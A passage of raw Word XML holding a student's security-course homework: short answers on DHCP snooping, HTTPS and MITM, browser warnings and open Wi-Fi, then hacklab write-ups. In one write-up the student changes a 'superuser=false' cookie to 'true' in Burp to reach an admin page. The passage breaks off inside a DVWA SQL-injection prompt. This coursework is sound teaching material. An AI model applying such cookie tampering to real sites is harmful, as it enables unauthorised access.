          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>DHCP snooping works by filtering out untrusted DHCP messages on unauthorized ports. The switch tracks the source of DHCP messages and associates them with specific ports, ensuring that only responses from a legitimate DHCP server are relayed to clients. This mechanism helps prevent both DHCP spoofing and starvation attacks by not relaying malicious DHCP responses to clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69121329" w14:textId="77777777" w:rsidR="009E6100" w:rsidRPr="00825934" w:rsidRDefault="009E6100" w:rsidP="00834899">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:ind w:left="1095"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:hint="eastAsia"/>
          <w:color w:val="102535"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1451C2C1" w14:textId="77777777" w:rsidR="00825934" w:rsidRPr="00825934" w:rsidRDefault="00825934" w:rsidP="00825934">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. (3 point) MITM Prevention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA9238F" w14:textId="77777777" w:rsidR="00825934" w:rsidRPr="00DA58A4" w:rsidRDefault="00825934" w:rsidP="00825934">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="1095"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Briefly explain (1 or 2 sentences max) how HTTPS can defeat MITM via ARP cache poisoning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E06711C" w14:textId="7AA483BB" w:rsidR="00825934" w:rsidRPr="00825934" w:rsidRDefault="00B7288B" w:rsidP="00825934">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="1095"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:hint="eastAsia"/>
          <w:color w:val="102535"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B7288B">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>HTTPS uses end-to-end encryption between browser and website, ensuring that even if an attacker redirects your traffic using ARP cache poisoning, they cannot decrypt or manipulate the information being exchanged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D332D73" w14:textId="1ABD4EAC" w:rsidR="00825934" w:rsidRPr="00DA58A4" w:rsidRDefault="00825934" w:rsidP="00825934">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="1095"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>In the same context, why did Chrome developers decided to display "Not Secure" on HTTP websites?</w:t>
      </w:r>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DA58A4">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:noProof/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D1E3805" wp14:editId="5C14E741">
            <wp:extent cx="4898298" cy="2344683"/>
            <wp:effectExtent l="0" t="0" r="4445" b="5080"/>
            <wp:docPr id="21019625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62536" name="Picture 2101962536"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4941725" cy="2365470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBB803A" w14:textId="4737A3A8" w:rsidR="00825934" w:rsidRPr="00825934" w:rsidRDefault="008774F6" w:rsidP="00825934">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="1095"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:hint="eastAsia"/>
          <w:color w:val="102535"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:hint="eastAsia"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="008774F6">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>o alert users that their data is not encrypted, making it vulnerable to interception or tampering by hackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBC22E4" w14:textId="4FDED693" w:rsidR="00825934" w:rsidRDefault="00825934" w:rsidP="00825934">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="1095"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>In the same context, what's the danger of ignoring a browser error message like this one and clicking on "Continue to this website"?</w:t>
      </w:r>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:noProof/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32DAAF34" wp14:editId="040F2A12">
            <wp:extent cx="5021317" cy="3263355"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1354263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3306" name="Picture 1354263306"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5115482" cy="3324553"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E12D162" w14:textId="29110003" w:rsidR="00825934" w:rsidRPr="00825934" w:rsidRDefault="008774F6" w:rsidP="00825934">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="1095"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:hint="eastAsia"/>
          <w:color w:val="102535"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008774F6">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>Ignoring a browser error like "Not Secure" and clicking "Continue to this website" exposes you to the risk of sending your personal information over an unsecured connection, where it can be easily stolen or manipulated by attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D8A510" w14:textId="7C51C485" w:rsidR="00825934" w:rsidRPr="00DA58A4" w:rsidRDefault="00825934" w:rsidP="00825934">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="1095"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Briefly write an explanation that you might provide to your grandparent (or anyone who may not be IT savvy) why they should be careful when connecting to open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>WiFi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> hotspots like the ones at airports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A41C26" w14:textId="0624DE8B" w:rsidR="00825934" w:rsidRPr="00825934" w:rsidRDefault="008936A5" w:rsidP="00825934">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="1095"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato" w:hint="eastAsia"/>
          <w:color w:val="102535"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>Tell them to i</w:t>
      </w:r>
      <w:r w:rsidR="00934DDE" w:rsidRPr="00934DDE">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve">magine an open </w:t>
      </w:r>
      <w:r w:rsidR="006D3836" w:rsidRPr="00934DDE">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:r w:rsidR="00934DDE" w:rsidRPr="00934DDE">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve"> hotspot like a busy public park where anyone can listen to your conversations. Just like you wouldn't share personal details loudly in the park, you should be cautious on open </w:t>
      </w:r>
      <w:r w:rsidR="00634B0E" w:rsidRPr="00934DDE">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:r w:rsidR="00934DDE" w:rsidRPr="00934DDE">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve"> because people might be 'listening' to steal your information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9DD80E" w14:textId="77777777" w:rsidR="00825934" w:rsidRPr="00825934" w:rsidRDefault="00825934" w:rsidP="00825934">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Part II</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34764C5B" w14:textId="77777777" w:rsidR="00825934" w:rsidRPr="00825934" w:rsidRDefault="00825934" w:rsidP="00825934">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Important: As usual, please write details of what you did to get full points.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395C0C89" w14:textId="77777777" w:rsidR="00825934" w:rsidRDefault="00825934" w:rsidP="00825934">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. (1 point) Go to http://&lt;Your Hacklab VM IP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>&gt;:8081/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>method.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to get the secret *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F01329C" w14:textId="3A814937" w:rsidR="00961640" w:rsidRPr="00961640" w:rsidRDefault="00961640" w:rsidP="00825934">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Trying</w:t>
      </w:r>
      <w:r w:rsidRPr="00961640">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> different </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">method to </w:t>
      </w:r>
      <w:r w:rsidR="001E771D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> the link by using the tool “Insomnia” (learnt from the WDC course),</w:t>
      </w:r>
      <w:r w:rsidR="001E771D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> finally got the secret by using “OPTIONS” method to access the link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F54C446" w14:textId="07BA04FD" w:rsidR="007540DB" w:rsidRPr="00825934" w:rsidRDefault="00FB3FF0" w:rsidP="00825934">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB3FF0">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="065E2339" wp14:editId="7B878F57">
            <wp:extent cx="5731510" cy="1539875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1564089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89079" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1539875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B59B691" w14:textId="77777777" w:rsidR="00825934" w:rsidRDefault="00825934" w:rsidP="00825934">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">(1 point) Go to http://&lt;Your Hacklab VM IP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>&gt;:8081/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>admin.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to get the secret *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0C55E6" w14:textId="2F7C7061" w:rsidR="002E19D1" w:rsidRPr="00545591" w:rsidRDefault="002E19D1" w:rsidP="00825934">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00545591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Using</w:t>
      </w:r>
      <w:r w:rsidRPr="00545591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidRPr="00545591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00545591" w:rsidRPr="00545591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>tool “Burp” to catch the request and found the cookie is “</w:t>
      </w:r>
      <w:r w:rsidR="00545591" w:rsidRPr="00545591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>superuser=</w:t>
      </w:r>
      <w:r w:rsidR="00545591" w:rsidRPr="00545591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>false”, simply change it to “</w:t>
      </w:r>
      <w:r w:rsidR="00545591" w:rsidRPr="00545591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>superuser=true</w:t>
      </w:r>
      <w:r w:rsidR="00545591" w:rsidRPr="00545591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>” and forward the request to get the secret.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEDE2C4" w14:textId="2008E840" w:rsidR="007540DB" w:rsidRDefault="002E19D1" w:rsidP="00825934">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E19D1">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10C29F18" wp14:editId="0221BE70">
            <wp:extent cx="5731510" cy="4478020"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="30966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63919" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4478020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3924B9F3" w14:textId="0656A96E" w:rsidR="00545591" w:rsidRDefault="00545591" w:rsidP="00825934">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00545591">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45AE86CD" wp14:editId="660B6ACB">
            <wp:extent cx="5731510" cy="3220720"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1200629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9829" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3220720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3BF3D1" w14:textId="77777777" w:rsidR="00770067" w:rsidRPr="00825934" w:rsidRDefault="00770067" w:rsidP="00825934">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BBDA780" w14:textId="77777777" w:rsidR="00825934" w:rsidRPr="00DA58A4" w:rsidRDefault="00825934" w:rsidP="00825934">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. (2 point) When on the high-security setting of DVWA, go to the SQL injection section and attempt to exploit the vulnerability. A helpful hint is to examine the source code present on the page. Retrieve the hash associated with the user ‘1337’ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>and also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
